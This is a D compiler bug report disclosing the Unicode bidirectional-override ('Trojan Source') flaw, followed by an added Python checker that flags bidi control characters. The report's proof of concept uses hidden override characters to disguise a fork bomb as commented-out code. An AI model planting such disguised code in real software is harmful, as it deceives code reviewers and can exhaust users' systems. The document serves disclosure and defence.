[Issue 22495] New: SECURITY: unicode directionality overrides should be rejected
d-bugmail at puremagic.com
Mon Nov 8 21:12:02 UTC 2021
https://issues.dlang.org/show_bug.cgi?id=22495
Issue ID: 22495
Summary: SECURITY: unicode directionality overrides should be rejected
Product: D
Version: D2
Hardware: All
OS: All
Status: NEW
Severity: blocker
Priority: P1
Component: dmd
Assignee: nobody at puremagic.com
Reporter: Ajieskola at gmail.com
Read:
https://www.schneier.com/blog/archives/2021/11/hiding-vulnerabilities-in-source-code.html
Demonstration (for Unix systems) that the vulnerability affects the D
compilers:
------------------
import std;
auto exploit =
"import core.sys.posix.unistd;
enum mode = \"safe\";
@safe void main(){
if (mode != \"safe\u202E \u2066) // Check if safe ( disabled\u2069\u2066\")
while(fork()){};
}";
@safe void main()
{ File("payload.d", "w").writeln(exploit);
}
------------------
When run, this file generates a program that looks like
----------
import core.sys.posix.unistd;
enum mode = "safe";
@safe void main(){
if (mode != "safe") // Check if safe ( disabled )
while(fork()){};
}
----------
But compiles like
----------
import core.sys.posix.unistd;
enum mode = "safe";
@safe void main(){
if (mode != "safe\u202E \u2066) // Check if safe ( disabled\u2069\u2066")
while(fork()){};
}
----------
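
A check a reviewer or CI job could run over sources such as payload.d, as an added example that is not part of the original report or of dmd: it lists every Unicode bidirectional embedding, override and isolate character (U+202A..U+202E, U+2066..U+2069) by line and column, and renders them as visible escapes. The function names and the embedded sample are constructed for illustration.

```python
import unicodedata

# Bidirectional formatting characters: embeddings/overrides (U+202A..U+202E)
# and isolates (U+2066..U+2069).
BIDI_CONTROLS = {chr(c) for c in (*range(0x202A, 0x202F), *range(0x2066, 0x206A))}


def find_bidi_controls(source: str):
    """Return (line, column, 'U+XXXX', name) for every bidi control in source."""
    findings = []
    for line_no, line in enumerate(source.split("\n"), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in BIDI_CONTROLS:
                findings.append(
                    (line_no, col, f"U+{ord(ch):04X}", unicodedata.name(ch))
                )
    return findings


def reveal(source: str) -> str:
    """Rewrite each bidi control as a visible \\uXXXX escape for review."""
    return "".join(
        f"\\u{ord(ch):04X}" if ch in BIDI_CONTROLS else ch for ch in source
    )


# Constructed sample: the generated program from the report, with the
# control characters written as Python escapes.
SAMPLE = (
    'import core.sys.posix.unistd;\n'
    'enum mode = "safe";\n'
    '@safe void main(){\n'
    'if (mode != "safe\u202E \u2066) // Check if safe ( disabled\u2069\u2066")\n'
    'while(fork()){};\n'
    '}\n'
)

if __name__ == "__main__":
    for line_no, col, codepoint, name in find_bidi_controls(SAMPLE):
        print(f"payload.d:{line_no}:{col}: {codepoint} {name}")
    print(reveal(SAMPLE))
```
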